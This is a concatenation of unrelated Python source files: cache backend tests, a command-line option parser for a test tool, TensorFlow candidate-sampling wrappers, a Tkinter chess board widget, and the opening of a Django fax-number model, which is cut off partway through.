        if not beaker_cache.has_beaker:
            raise SkipTest("Beaker is required for these tests.")
        if not py27:
            raise SkipTest("newer beakers not working w/ py26")
    def _install_mock_cache(self, template, implname=None):
        """Attach a Beaker CacheManager to the template before
        installing the mock cache implementation."""
        template.cache_args["manager"] = self._regions()
        impl = super(BeakerCacheTest, self)._install_mock_cache(
            template, implname
        )
        return impl
    def _regions(self):
        # In-memory regions matching the names used by test_region:
        # "short" expires quickly, "long" effectively never (60s).
        return beaker.cache.CacheManager(
            cache_regions={
                "short": {"expire": 1, "type": "memory"},
                "long": {"expire": 60, "type": "memory"},
            }
        )
class DogpileCacheTest(RealBackendTest, CacheTest):
    """Runs the cache suite against the dogpile.cache backend."""
    real_backend = "dogpile.cache"
    def setUp(self):
        # Skip when dogpile.cache is not installed.
        try:
            import dogpile.cache  # noqa
        except ImportError:
            raise SkipTest("dogpile.cache is required to run these tests")
    def _install_mock_cache(self, template, implname=None):
        """Attach dogpile regions (defaulting to "short") before
        installing the mock cache implementation."""
        template.cache_args["regions"] = self._regions()
        template.cache_args.setdefault("region", "short")
        impl = super(DogpileCacheTest, self)._install_mock_cache(
            template, implname
        )
        return impl
    def _regions(self):
        from dogpile.cache import make_region
        # "short" expires quickly for expiry tests; "long"/"myregion"
        # persist for the duration of a test run.
        my_regions = {
            "short": make_region().configure(
                "dogpile.cache.memory", expiration_time=1
            ),
            "long": make_region().configure(
                "dogpile.cache.memory", expiration_time=60
            ),
            "myregion": make_region().configure(
                "dogpile.cache.memory", expiration_time=60
            ),
        }
        return my_regions
| |
""" Option handling. """
import sys, os
from stdout import log, warning, error, new_line
import flags, lib, iolib
# List of options. An option is a triplet of:
# * a list of string representations of the option,
# * a description of the option for help printing,
# * an action taking the tail of arguments and returning its new
# state.
#
# Additionally, an option with an empty list of representations
# is understood as an option section header.
# Registry of option triplets; populated below by _add_option and
# _add_option_header at import time.
_options = []
# Marker ending option parsing: everything after it is a file argument.
_options_end = "--"
def _print_help():
    """ Prints usage and the formatted list of registered options. """
    log("", 1)
    log("Usage: <option>* <file>", 1)
    log("   or: <option>* {} <file>+".format(_options_end), 1)
    log("where <option> can be", 1)
    for reps, lines, _action in _options:
        # An empty representation list marks a section header.
        if not reps:
            new_line(1)
            for line in lines:
                log("|===| {}".format(line), 1)
        else:
            log("> {}".format(reps), 1)
            for line in lines:
                log("  {}".format(line), 1)
    new_line(1)
def _print_help_exit(code):
    """ Prints the options and exits the process with `code`. """
    _print_help()
    sys.exit(code)
def _find_option_triplet(option):
    """ Returns the first registered triplet whose representations
    contain `option`, or None when nothing matches. """
    for candidate in _options:
        if option in candidate[0]:
            return candidate
    # No registered option matched (explicit for readability; the
    # original fell off the end and returned None implicitly).
    return None

# Flags that print the help message; recognized anywhere on the line.
_help_flags = ["-h", "--help"]
def parse_arguments():
    """ Parses ``sys.argv``, applies the action of each recognized
    option, and returns the remaining (file) arguments.

    Exits the process on -h/--help (code 0), on an unknown option,
    on a failing option action, or when no file is given (code 1).
    """
    # Ignore first package/file name argument.
    args = sys.argv[1:]

    def handle_options(args):
        """ Consumes options from the front of `args` and returns the
        leftover (non-option) arguments.

        Iterative rewrite of the original self-recursion: Python has
        no tail-call optimization, so a loop avoids growing the stack
        on long command lines. Behavior is unchanged, including the
        quirk that a trailing lone option is returned unprocessed. """
        while len(args) >= 2:
            option = args[0]
            triplet = _find_option_triplet(option)
            if option == _options_end:
                # End of options, remaining arguments should be files.
                return args[1:]
            elif triplet is None:  # was `== None`; identity test is correct
                # Unknown option, error.
                _print_help()
                error( "Unexpected option \"{}\".".format(option) )
                new_line(1)
                sys.exit(1)
            else:
                try:
                    args = triplet[2](args[1:])
                except ValueError as e:
                    # Option handler crashed, error.
                    _print_help()
                    error( "Error on option \"{}\":".format(option) )
                    error( "> {}.".format(e) )
                    new_line(1)
                    sys.exit(1)
        # One argument or less left, returning.
        return args

    if len(args) < 1:
        _print_help()
        error("No file specified.")
        new_line(1)
        sys.exit(1)
    # Help flags short-circuit everything else.
    for f in _help_flags:
        if f in args:
            _print_help()
            new_line(1)
            sys.exit(0)
    args = handle_options(args)
    return args
# Building the list of options.
def _add_option(reps, desc, l4mbda):
    """ Adds an option to the option list.

    reps   -- list of string representations (e.g. ["-v"]),
    desc   -- list of description lines for help printing,
    l4mbda -- action taking the argument tail, returning the new tail.
    """
    _options.append((reps, desc, l4mbda))

def _add_option_header(lines):
    """ Adds an option section header to the option list.

    Headers have an empty representation list, so _find_option_triplet
    never returns them and their action is never invoked. """
    def _header_action(tail):
        # Fix: the action slot used to hold a bare "" (not callable);
        # keep it a real callable so invoking it fails loudly.
        raise AssertionError("option header action should never be called")
    _options.append((
        [],
        lines,
        _header_action
    ))
# Help option.
_add_option(
    _help_flags,
    ["prints the help message and exits"],
    # Exits with status 0; never returns a tail.
    lambda tail: _print_help_exit(0)
)
# Verbose option section header.
_add_option_header((
    ["Verbosity options."]
))
# Verbose option.
def _v_action(tail):
    """ Sets maximum log verbosity (level 3); consumes no arguments. """
    flags.set_log_lvl(3)
    return tail
_add_option(
    ["-v"],
    ["verbose output"],
    _v_action
)
# Quiet 1 option.
def _q1_action(tail):
    """ Restricts output to errors/warnings (level 1). """
    flags.set_log_lvl(1)
    return tail
_add_option(
    ["-q"],
    ["no output except errors and warnings"],
    _q1_action
)
# Quiet 2 option.
def _q2_action(tail):
    """ Silences all output (level 0). """
    flags.set_log_lvl(0)
    return tail
_add_option(
    ["-qq"],
    ["no output at all"],
    _q2_action
)
# Test case construction section header.
_add_option_header((
    ["Test context construction options."]
))
# Adding binaries option.
def _add_binary_action(tail):
    """ Consumes three arguments -- binary name, command, and test
    context file -- and registers the binary for addition.
    Raises ValueError on missing or malformed arguments. """
    if len(tail) < 3: raise ValueError(
        "expected three arguments but found {}".format(len(tail))
    )
    fst = tail[0]
    snd = tail[1]
    thd = tail[2]
    triple = fst, snd, thd
    # A leading "-" suggests the user passed another option instead
    # of the expected value.
    if fst.startswith("-"): raise ValueError(
        "expected binary name but found \"{}\"".format(fst)
    )
    if snd.startswith("-"): raise ValueError(
        "expected binary command but found \"{}\"".format(snd)
    )
    if thd.startswith("-"): raise ValueError(
        "expected test context file but found \"{}\"".format(thd)
    )
    if not os.path.isfile(thd): raise ValueError(
        "test context file \"{}\" does not exist".format(thd)
    )
    flags.add_binary_to_add(triple)
    # Three arguments consumed.
    return tail[3:]
_add_option(
    ["--add_bin"],
    [
        "> of n cmd ctxt (default {})".format(
            flags.binaries_to_add_default()
        ),
        "will add the binary with name \"n\", command \"cmd\" to the test",
        "context in file \"ctxt\""
    ],
    _add_binary_action
)
# Adding oracle option.
def _add_oracle_action(tail):
    """ Consumes three arguments -- oracle name, command, and test
    context file -- and registers the oracle for addition.
    Raises ValueError on missing or malformed arguments. """
    if len(tail) < 3: raise ValueError(
        "expected three arguments but found {}".format(len(tail))
    )
    fst = tail[0]
    snd = tail[1]
    thd = tail[2]
    triple = fst, snd, thd
    if fst.startswith("-"): raise ValueError(
        "expected oracle name but found \"{}\"".format(fst)
    )
    # Fix: message said "binary command" in the oracle handler.
    if snd.startswith("-"): raise ValueError(
        "expected oracle command but found \"{}\"".format(snd)
    )
    if thd.startswith("-"): raise ValueError(
        "expected test context file but found \"{}\"".format(thd)
    )
    if not os.path.isfile(thd): raise ValueError(
        "test context file \"{}\" does not exist".format(thd)
    )
    # NOTE(review): mirrors _add_binary_action and still calls
    # flags.add_binary_to_add; if the flags module exposes an
    # add_oracle_to_add it should be used here -- confirm.
    flags.add_binary_to_add(triple)
    return tail[3:]
# Fix: this registration was a verbatim copy of --add_bin (same flag,
# same action), so --add_oracle never existed and _add_oracle_action
# was dead code. Register the oracle option properly.
_add_option(
    ["--add_oracle"],
    [
        "> of n cmd ctxt",
        "will add the oracle with name \"n\", command \"cmd\" to the test",
        "context in file \"ctxt\""
    ],
    _add_oracle_action
)
# Test case type-check option.
def _type_check_action(tail):
    """ Parses one boolean argument enabling/disabling test case
    type checking; raises ValueError on a malformed boolean. """
    flags.set_type_check_test_cases( lib.bool_of_string(tail[0]) )
    return tail[1:]
_add_option(
    ["--type_check"],
    [
        "> of bool (default {})".format(
            flags.type_check_test_cases_default()
        ),
        "if true, test cases will be type checked (may be expensive",
        "for large test cases)"
    ],
    _type_check_action
)
# Test execution section header.
_add_option_header((
    ["Test execution options."]
))
# Run tests option.
def _run_tests_action(tail):
    """ Parses one boolean argument enabling/disabling execution. """
    flags.set_run_tests( lib.bool_of_string(tail[0]) )
    return tail[1:]
_add_option(
    ["--run_tests"],
    [
        "> bool (default {})".format(
            flags.run_tests_default()
        ),
        "if true, test cases will be executed"
    ],
    _run_tests_action
)
# Max proc option.
def _max_proc_action(tail):
    """ Parses one integer argument bounding process parallelism. """
    flags.set_max_proc( lib.int_of_string(tail[0]) )
    return tail[1:]
_add_option(
    ["--max_proc"],
    [
        "> int (default {})".format(
            flags.max_proc_default()
        ),
        "maximum number of processes to run in parallel"
    ],
    _max_proc_action
)
# Output directory option.
def _out_dir_action(tail):
    """ Parses one path argument; warns (and later creates) when the
    directory does not exist yet. """
    path = tail[0]
    iolib.is_legal_dir_path(
        path,
        if_not_there_do=(lambda: warning(
            ("Output directory \"{}\" does not exist "
            "and will be created.\n").format(path)
        ))
    )
    flags.set_out_dir(path)
    return tail[1:]
_add_option(
    ["--out_dir"],
    [
        "> path (default {})".format(
            flags.out_dir_default()
        ),
        "sets the output directory"
    ],
    _out_dir_action
)
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Wrappers for primitive Neural Net (NN) Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_candidate_sampling_ops
from tensorflow.python.ops import math_ops
def uniform_candidate_sampler(true_classes, num_true, num_sampled, unique,
                              range_max, seed=None, name=None):
  """Samples a set of classes using a uniform base distribution.

  Draws `num_sampled` classes from the integer range `[0, range_max)`,
  without replacement when `unique=True` and with replacement otherwise,
  where every class has equal base probability. Also returns the expected
  occurrence counts `Q(y|x)` of the true and sampled classes under the
  sampling distribution (see
  http://www.tensorflow.org/extras/candidate_sampling.pdf). With
  `unique=True` those counts are approximate post-rejection values.

  Args:
    true_classes: An `int64` `Tensor` of shape `[batch_size, num_true]`;
      the target classes.
    num_true: An `int`. The number of target classes per training example.
    num_sampled: An `int`. The number of classes to randomly sample per batch.
    unique: A `bool`. Whether all sampled classes in a batch are unique.
    range_max: An `int`. The number of possible classes.
    seed: An `int`. An operation-specific seed. Default is 0.
    name: A name for the operation (optional).

  Returns:
    sampled_candidates: An `int64` tensor of shape `[num_sampled]`;
      the sampled classes.
    true_expected_count: A `float` tensor shaped like `true_classes`;
      expected counts of each true class under the sampling distribution.
    sampled_expected_count: A `float` tensor shaped like
      `sampled_candidates`; expected counts of each sampled class.
  """
  # Split the user-level seed into the (graph, op) seed pair that the
  # generated kernel expects.
  op_seed, op_seed2 = random_seed.get_seed(seed)
  return gen_candidate_sampling_ops._uniform_candidate_sampler(
      true_classes, num_true, num_sampled, unique, range_max,
      seed=op_seed, seed2=op_seed2, name=name)
def log_uniform_candidate_sampler(true_classes, num_true, num_sampled, unique,
                                  range_max, seed=None, name=None):
  """Samples a set of classes using a log-uniform (Zipfian) base distribution.

  Draws `num_sampled` classes from `[0, range_max)` — without replacement
  when `unique=True`, with replacement otherwise — under the approximately
  log-uniform base distribution

      `P(class) = (log(class + 2) - log(class + 1)) / log(range_max + 1)`

  This is appropriate when classes are sorted in decreasing order of
  frequency (e.g. a frequency-sorted lexicon); do not use it otherwise.
  Also returns the expected occurrence counts `Q(y|x)` of the true and
  sampled classes under the sampling distribution (see
  http://www.tensorflow.org/extras/candidate_sampling.pdf). With
  `unique=True` those counts are approximate post-rejection values.

  Args:
    true_classes: An `int64` `Tensor` of shape `[batch_size, num_true]`;
      the target classes.
    num_true: An `int`. The number of target classes per training example.
    num_sampled: An `int`. The number of classes to randomly sample per batch.
    unique: A `bool`. Whether all sampled classes in a batch are unique.
    range_max: An `int`. The number of possible classes.
    seed: An `int`. An operation-specific seed. Default is 0.
    name: A name for the operation (optional).

  Returns:
    sampled_candidates: An `int64` tensor of shape `[num_sampled]`;
      the sampled classes.
    true_expected_count: A `float` tensor shaped like `true_classes`;
      expected counts of each true class under the sampling distribution.
    sampled_expected_count: A `float` tensor shaped like
      `sampled_candidates`; expected counts of each sampled class.
  """
  # Split the user-level seed into the (graph, op) seed pair that the
  # generated kernel expects.
  op_seed, op_seed2 = random_seed.get_seed(seed)
  return gen_candidate_sampling_ops._log_uniform_candidate_sampler(
      true_classes, num_true, num_sampled, unique, range_max,
      seed=op_seed, seed2=op_seed2, name=name)
def learned_unigram_candidate_sampler(true_classes, num_true, num_sampled,
                                      unique, range_max, seed=None, name=None):
  """Samples a set of classes from a distribution learned during training.

  Draws `num_sampled` classes from `[0, range_max)` — without replacement
  when `unique=True`, with replacement otherwise — from a unigram
  distribution built on the fly: every class starts with weight 1 and is
  incremented each time it appears as a target class. The learned weights
  are not saved to checkpoints, so the distribution resets when the model
  is reloaded. Also returns the expected occurrence counts `Q(y|x)` of the
  true and sampled classes under the sampling distribution (see
  http://www.tensorflow.org/extras/candidate_sampling.pdf). With
  `unique=True` those counts are approximate post-rejection values.

  Args:
    true_classes: An `int64` `Tensor` of shape `[batch_size, num_true]`;
      the target classes.
    num_true: An `int`. The number of target classes per training example.
    num_sampled: An `int`. The number of classes to randomly sample per batch.
    unique: A `bool`. Whether all sampled classes in a batch are unique.
    range_max: An `int`. The number of possible classes.
    seed: An `int`. An operation-specific seed. Default is 0.
    name: A name for the operation (optional).

  Returns:
    sampled_candidates: An `int64` tensor of shape `[num_sampled]`;
      the sampled classes.
    true_expected_count: A `float` tensor shaped like `true_classes`;
      expected counts of each true class under the sampling distribution.
    sampled_expected_count: A `float` tensor shaped like
      `sampled_candidates`; expected counts of each sampled class.
  """
  # Split the user-level seed into the (graph, op) seed pair that the
  # generated kernel expects.
  op_seed, op_seed2 = random_seed.get_seed(seed)
  return gen_candidate_sampling_ops._learned_unigram_candidate_sampler(
      true_classes, num_true, num_sampled, unique, range_max,
      seed=op_seed, seed2=op_seed2, name=name)
def fixed_unigram_candidate_sampler(true_classes,
                                    num_true,
                                    num_sampled,
                                    unique,
                                    range_max,
                                    vocab_file='',
                                    distortion=1.0,
                                    num_reserved_ids=0,
                                    num_shards=1,
                                    shard=0,
                                    unigrams=(),
                                    seed=None,
                                    name=None):
  """Samples a set of classes using the provided (fixed) base distribution.

  Draws `num_sampled` classes from `[0, range_max)` — without replacement
  when `unique=True`, with replacement otherwise — from a fixed unigram
  distribution supplied either as a file (`vocab_file`) or in memory
  (`unigrams`), optionally skewed by a `distortion` power. Also returns
  the expected occurrence counts `Q(y|x)` of the true and sampled classes
  under the sampling distribution (see
  http://www.tensorflow.org/extras/candidate_sampling.pdf). With
  `unique=True` those counts are approximate post-rejection values.

  Args:
    true_classes: An `int64` `Tensor` of shape `[batch_size, num_true]`;
      the target classes.
    num_true: An `int`. The number of target classes per training example.
    num_sampled: An `int`. The number of classes to randomly sample per batch.
    unique: A `bool`. Whether all sampled classes in a batch are unique.
    range_max: An `int`. The number of possible classes.
    vocab_file: CSV-like file whose valid lines correspond to word IDs in
      sequential order starting from `num_reserved_ids`; the last entry of
      each line is the count or relative probability. Exactly one of
      `vocab_file` and `unigrams` must be given.
    distortion: Each weight is raised to this power before being added to
      the internal distribution; `1.0` is plain unigram sampling and `0.0`
      a uniform distribution.
    num_reserved_ids: IDs in `[0, num_reserved_ids]` (e.g. a special
      unknown-word token at ID 0) get sampling probability 0.
    num_shards: Number of partitions of the range when sampling is
      parallelized (used together with `shard`).
    shard: Which partition this op handles (used together with
      `num_shards`).
    unigrams: In-memory list of unigram counts or probabilities, one per
      ID in sequential order. Exactly one of `vocab_file` and `unigrams`
      must be given.
    seed: An `int`. An operation-specific seed. Default is 0.
    name: A name for the operation (optional).

  Returns:
    sampled_candidates: An `int64` tensor of shape `[num_sampled]`;
      the sampled classes.
    true_expected_count: A `float` tensor shaped like `true_classes`;
      expected counts of each true class under the sampling distribution.
    sampled_expected_count: A `float` tensor shaped like
      `sampled_candidates`; expected counts of each sampled class.
  """
  # Split the user-level seed into the (graph, op) seed pair that the
  # generated kernel expects.
  op_seed, op_seed2 = random_seed.get_seed(seed)
  return gen_candidate_sampling_ops._fixed_unigram_candidate_sampler(
      true_classes, num_true, num_sampled, unique, range_max,
      vocab_file=vocab_file, distortion=distortion,
      num_reserved_ids=num_reserved_ids, num_shards=num_shards, shard=shard,
      unigrams=unigrams, seed=op_seed, seed2=op_seed2, name=name)
def all_candidate_sampler(true_classes, num_true, num_sampled, unique,
                          seed=None, name=None):
  """Generate the set of all classes.

  Deterministically returns the entire range `[0, num_sampled)` as the
  sampled set. Intended for testing only: using it is equivalent to full
  softmax / full logistic regression.

  Args:
    true_classes: An `int64` `Tensor` of shape `[batch_size, num_true]`;
      the target classes.
    num_true: An `int`. The number of target classes per training example.
    num_sampled: An `int`. The number of possible classes.
    unique: A `bool`. Ignored.
    seed: An `int`. An operation-specific seed. Default is 0.
    name: A name for the operation (optional).

  Returns:
    sampled_candidates: An `int64` tensor of shape `[num_sampled]`
      containing the full class range.
    true_expected_count: A `float` tensor shaped like `true_classes`;
      all values are 1.0.
    sampled_expected_count: A `float` tensor shaped like
      `sampled_candidates`; all values are 1.0.
  """
  # Split the user-level seed into the (graph, op) seed pair that the
  # generated kernel expects.
  op_seed, op_seed2 = random_seed.get_seed(seed)
  return gen_candidate_sampling_ops._all_candidate_sampler(
      true_classes, num_true, num_sampled, unique,
      seed=op_seed, seed2=op_seed2, name=name)
def compute_accidental_hits(true_classes, sampled_candidates, num_true,
                            seed=None, name=None):
  """Compute the position ids in `sampled_candidates` matching `true_classes`.

  In Candidate Sampling (Sampled Softmax, Sampled Logistic) an
  "accidental hit" is a sampled class that equals a target class.
  Assuming `sampled_candidates` are unique, this op reports each hit as a
  triple `(index, id, weight)` where `index` is the row in `true_classes`,
  `id` the position in `sampled_candidates`, and `weight` is `-FLOAT_MAX`.
  Passing the result through `sparse_to_dense` and adding it to the
  sampled-class logits virtually removes accidentally-sampled true classes
  from the noise set. See
  http://www.tensorflow.org/extras/candidate_sampling.pdf.

  Args:
    true_classes: An `int64` `Tensor` of shape `[batch_size, num_true]`;
      the target classes.
    sampled_candidates: An `int64` tensor of shape `[num_sampled]`; the
      `sampled_candidates` output of a CandidateSampler.
    num_true: An `int`. The number of target classes per training example.
    seed: An `int`. An operation-specific seed. Default is 0.
    name: A name for the operation (optional).

  Returns:
    indices: An `int32` `Tensor` of shape `[num_accidental_hits]`;
      rows in `true_classes`.
    ids: An `int64` `Tensor` of shape `[num_accidental_hits]`;
      positions in `sampled_candidates`.
    weights: A `float` `Tensor` of shape `[num_accidental_hits]`;
      every value is `-FLOAT_MAX`.
  """
  # Split the user-level seed into the (graph, op) seed pair that the
  # generated kernel expects.
  op_seed, op_seed2 = random_seed.get_seed(seed)
  return gen_candidate_sampling_ops._compute_accidental_hits(
      true_classes, sampled_candidates, num_true,
      seed=op_seed, seed2=op_seed2, name=name)
@ops.RegisterShape("AllCandidateSampler")
@ops.RegisterShape("FixedUnigramCandidateSampler")
@ops.RegisterShape("LearnedUnigramCandidateSampler")
@ops.RegisterShape("LogUniformCandidateSampler")
@ops.RegisterShape("ThreadUnsafeUnigramCandidateSampler")
@ops.RegisterShape("UniformCandidateSampler")
def _CandidateSamplerShape(op):
  """Shared shape fn for all candidate samplers: outputs are
  `[num_sampled]`, `[batch_size, num_true]`, `[num_sampled]`."""
  # Input must be the rank-2 true_classes tensor.
  input_shape = op.inputs[0].get_shape().with_rank(2)
  batch_size = input_shape[0]
  n_sampled = op.get_attr("num_sampled")
  n_true = op.get_attr("num_true")
  return [
      tensor_shape.vector(n_sampled),
      tensor_shape.matrix(batch_size, n_true),
      tensor_shape.vector(n_sampled),
  ]
@ops.RegisterShape("ComputeAccidentalHits")
def _ComputeAccidentalHitsShape(op):
  """Shape fn for ComputeAccidentalHits: three unknown-length vectors."""
  n_true = op.get_attr("num_true")
  # The merge is purely a validity check that the input agrees with the
  # num_true attr; its result is deliberately unused and does not affect
  # the output shapes, which depend on runtime hit counts.
  op.inputs[0].get_shape().merge_with(tensor_shape.matrix(None, n_true))
  hits_vector = tensor_shape.vector(None)
  return [hits_vector, hits_vector, hits_vector]
| |
#!/usr/bin/python
# Copyright 2012, 2013 Andrew Lamoureux
#
# This file is a part of FunChess
#
# FunChess is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#!/usr/bin/python
import re
import sys
import Tkinter
import Common
from ChessState import ChessState
class ChessBoard(Tkinter.Frame):
    """Tk widget rendering a chess position (a ChessState) as an 8x8
    grid of piece bitmaps on a canvas, with optional flipped display
    and an HTML rendering of the same board."""
    def __init__(self, parent, pieceWidth=48, pieceHeight=48):
        Tkinter.Frame.__init__(self, parent)
        self.parent = parent
        self.chessState = {}
        # 0 = white at bottom; 1 = flipped (toggled via flip()).
        self.flippedDisplay = 0
        self.pieceWidth = pieceWidth
        self.pieceHeight = pieceHeight
        self.width = 8*pieceWidth
        self.height = 8*pieceHeight
        self.canvas = Tkinter.Canvas(self, width=self.width, height=self.height)
        # [0,1,2,...] = [a8,a7,a6,...]
        self.state = [' ']*64
        # Canvas image item ids, one per square, filled by draw().
        self.stateImg = [None]*64
        # bitmaps
        # maps 'bdd' to 'bdd48.gif', etc.
        self.bitmapFiles = {}
        # maps 'bdd' to PhotoImage instance, etc.
        self.bitmaps = {}
        self.loadBitmaps()
        #
        self.canvas.grid(row=0, column=0)
    def setState(self, state):
        """Displays a copy of the given ChessState (takes effect on draw())."""
        self.chessState = state.copy()
    def setFEN(self, fen):
        """Displays the position described by a FEN string."""
        self.chessState = ChessState(fen)
    #--------------------------------------------------------------------------
    # drawing stuff
    #--------------------------------------------------------------------------
    # maps {p,b,n,r,q,k,P,B,N,R,Q,K} X {0,1} to eg: "bdd48"
    #
    def fenPieceToBitmapFileRootName(self, p, square):
        """Maps FEN piece char `p` (or ' ' for empty) plus square color
        to the image root name, e.g. ('b', 0) -> "bdd48"."""
        # square is either 'd'/0 (dark) or 'l'/1 (light)
        mapping = { 'P':'pl', 'p':'pd',
                    'B':'bl', 'b':'bd',
                    'N':'nl', 'n':'nd',
                    'R':'rl', 'r':'rd',
                    'Q':'ql', 'q':'qd',
                    'K':'kl', 'k':'kd'
                  }
        colorChar = ['d', 'l'][square]
        if p == ' ':
            # Empty square: just the colored square bitmap.
            return colorChar + 'sq48'
        else:
            if not p in mapping:
                # Fix: was `raise "invalid piece!"` -- string exceptions
                # are illegal (TypeError at raise time); raise a real one.
                raise ValueError("invalid piece: %r" % p)
            return mapping[p] + colorChar + '48'
    def fenPieceToBitmap(self, p, square):
        """Returns the PhotoImage for piece `p` on the given square color."""
        # Fix: a second identical definition of this method (which
        # silently shadowed this one) was removed.
        rootName = self.fenPieceToBitmapFileRootName(p, square)
        return self.bitmaps[rootName]
    def fenPieceToBitmapFile(self, p, square):
        """Returns the image file path for piece `p` on the square color."""
        rootName = self.fenPieceToBitmapFileRootName(p, square)
        return './images/' + rootName + '.gif'
    def flip(self):
        """Toggles flipped display; takes effect on the next draw()."""
        self.flippedDisplay = (self.flippedDisplay + 1) & 1
    def loadBitmaps(self):
        """Loads every piece/square GIF into self.bitmaps keyed by the
        file root name ('bdd', 'dsq', ...)."""
        imageFiles = [ \
            'bdd48.gif', 'dsq48.gif', 'kll48.gif', 'nld48.gif', 'pld48.gif', 'qld48.gif', \
            'bdl48.gif', 'kdd48.gif', 'lsq48.gif', 'nll48.gif', 'pll48.gif', 'qll48.gif', \
            'rld48.gif', 'bld48.gif', 'kdl48.gif', 'ndd48.gif', 'pdd48.gif', 'qdd48.gif', \
            'rdd48.gif', 'rll48.gif', 'bll48.gif', 'kld48.gif', 'ndl48.gif', 'pdl48.gif', \
            'qdl48.gif', 'rdl48.gif']
        for imgF in imageFiles:
            # strip off the ".gif" - keys are just "bdd", "dsq", etc.
            key = re.sub(r'^(.*)\.gif$', r'\1', imgF)
            imgPath = './images/' + imgF
            #print 'setting self.bitmaps[%s] = %s' % (key, imgPath)
            self.bitmapFiles[key] = imgPath
            self.bitmaps[key] = Tkinter.PhotoImage(file=imgPath)
    def draw(self):
        """Draws the current chessState onto the canvas, honoring
        flippedDisplay. Raises if no state has been set."""
        if not self.chessState:
            raise Exception("ChessBoard cannot draw without chessState being set!")
        pieceGetSequence = range(64)
        if self.flippedDisplay:
            pieceGetSequence.reverse()
        for i in range(64):
            # Center of square i in canvas coordinates.
            xCoord = self.pieceWidth/2 + self.pieceWidth * (i%8)
            yCoord = self.pieceHeight/2 + self.pieceHeight * (i/8)
            #print 'drawing a %s at (%d,%d)' % (self.state[i], xCoord, yCoord)
            self.stateImg[i] = self.canvas.create_image( \
                [xCoord, yCoord], \
                image = self.fenPieceToBitmap( \
                    self.chessState.squares[ \
                        Common.squaresSan[pieceGetSequence[i]] \
                    ], \
                    (i + i/8 + 1)%2 \
                )
            )
    def draw_html(self):
        """Returns the current position as an HTML table of <img> tags,
        honoring flippedDisplay. Raises if no state has been set."""
        if not self.chessState:
            raise Exception("ChessBoard cannot draw without chessState being set!")
        html = '<table border=0 cellpadding=0 cellspacing=0>\n'
        pieceGetSequence = range(64)
        if self.flippedDisplay:
            pieceGetSequence.reverse()
        html += '<tr>\n'
        for i in range(64):
            # end current row, start new row
            if not (i%8):
                html += '\n</tr>\n'
                html += '<tr>\n'
            # table cell has image in it
            # get either 0,1,2,... or 63,62,61,...
            tmp = pieceGetSequence[i]
            # map 0->'a8', 63->'h1', etc.
            tmp = Common.squaresSan[tmp]
            # map 'a8' to 'r' or 'R' for example (getting piece)
            tmp = self.chessState.squares[tmp]
            # finally, map that piece to a filename
            tmp = self.fenPieceToBitmapFile(tmp, (i+i/8+1)%2)
            html += '  <td><img src="%s" /></td>\n' % tmp
        html += '\n</tr>\n'
        html += '</table>\n'
        return html
# test frame that holds a ChessBoard widget
#
class ChessBoardTest(Tkinter.Frame):
    """Manual test harness: a ChessBoard plus flip/html buttons and a
    move-entry field that advances the displayed ChessState."""
    def __init__(self, parent, pieceWidth=48, pieceHeight=48):
        Tkinter.Frame.__init__(self, parent)
        self.parent = parent
        self.chessState = ChessState(Common.initChessFEN)
        self.cb = ChessBoard(self)
        self.cb.setState(self.chessState)
        self.cb.draw()
        self.cb.pack()
        self.b = Tkinter.Button(self, text="flip", command=self.flipIt)
        self.b.pack()
        # NOTE(review): self.b is rebound here, dropping the reference
        # to the "flip" button (the widget itself survives via pack()).
        self.b = Tkinter.Button(self, text="html", command=self.html)
        self.b.pack()
        self.moveEntry = Tkinter.Entry(self)
        self.moveEntry.pack()
        self.execMove = Tkinter.Button(self, text="execute move", command=self.executeMove)
        self.execMove.pack()
    def flipIt(self):
        # Toggle orientation and redraw.
        self.cb.flip()
        self.cb.draw()
    def html(self):
        # Dump the HTML rendering to stdout (Python 2 print statement).
        print self.cb.draw_html()
    def executeMove(self):
        """Applies the move typed into the entry field to the current
        state and redraws the board."""
        whatMove = self.moveEntry.get()
        print "Executing: " + whatMove
        self.chessState = self.chessState.transition(whatMove)
        self.cb.setState(self.chessState)
        self.cb.draw()
def doTest():
    """Opens a Tk window with the ChessBoardTest harness and blocks in
    the Tk main loop until the window is closed."""
    # root window
    root = Tkinter.Tk()
    root.wm_title("Chess Board Test\n")
    # reserve board on root
    cbt = ChessBoardTest(root)
    cbt.pack()
    # run
    root.mainloop()
if __name__ == "__main__":
    doTest()
| |
""" Core Models """
#
# pylint: disable-msg=R0903,R0904,W0232
#
# R0903 - too few public methods
# R0904 - too many public methods
# W0232 = class has no __init__ method
#
from django.contrib.auth.models import User
from django.db import models
from django.contrib.localflavor.us.models import PhoneNumberField
from django.db.models import permalink
from django.utils.timesince import timesince
from datetime import datetime
import time
import logging
logging = logging.getLogger('models')
###############################################################################
def manager(model):
    """
    Return the default manager (``objects``) for *model*.

    Exists so call sites can fetch the manager without triggering
    pylint attribute warnings on Django model classes.
    """
    return getattr(model, 'objects')
###############################################################################
class FaxNumber(models.Model):
    """
    Associates a fax number with a user. The fax number can be one
    from which the user sends faxes (i.e., an external number from
    which the fax will be sent) or a number at which the user's account
    receives faxes (i.e., an internal number).
    """
    # Values for the ``type`` field below.
    USER_SENDS_FROM = 'E' # External
    USER_RECVS_AT = 'I' # Internal
    # Owning user; reverse relation is user.fax_numbers.
    user = models.ForeignKey(
        User,
        related_name = 'fax_numbers')
    # The fax number itself; globally unique across users.
    number = PhoneNumberField(
        blank = False,
        db_index = True,
        unique = True )
    # External sender number vs. internal receive number.
    type = models.CharField(
        max_length = 1,
        default = USER_SENDS_FROM,
        choices = [ (USER_SENDS_FROM, 'External Sender #'),
